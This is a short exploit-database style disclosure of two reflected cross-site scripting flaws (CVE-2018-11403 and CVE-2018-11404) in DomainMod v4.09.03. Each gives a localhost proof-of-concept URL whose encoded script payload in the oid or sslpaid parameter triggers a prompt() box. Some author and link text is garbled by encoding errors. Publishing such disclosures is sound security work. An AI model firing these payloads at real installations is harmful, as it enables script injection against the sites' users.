DomainMod 4.09.03 Cross Site Scripting

`# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter  
# Date: 2018-05-28  
# Exploit Author: longeri1/[email protected]/4  
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)  
# Software Link: domainmod (https://github.com/domainmod/domainmod)  
# Version: v4.09.03  
# CVE : CVE-2018-11403  
  
An issue was discovered in DomainMod v4.09.03.i1/4https://github.com/domainmod/domainmod/issues/63i1/4  
After the user logged in, open the url :  
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E  
  
  
# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter  
# Date: 2018-05-28  
# Exploit Author: longeri1/[email protected]/4  
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)  
# Software Link: domainmod (https://github.com/domainmod/domainmod)  
# Version: v4.09.03  
# CVE : CVE-2018-11404  
  
An issue was discovered in DomainMod v4.09.03.i1/4https://github.com/domainmod/domainmod/issues/63i1/4  
After the user logged in, open the url:  
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E  
`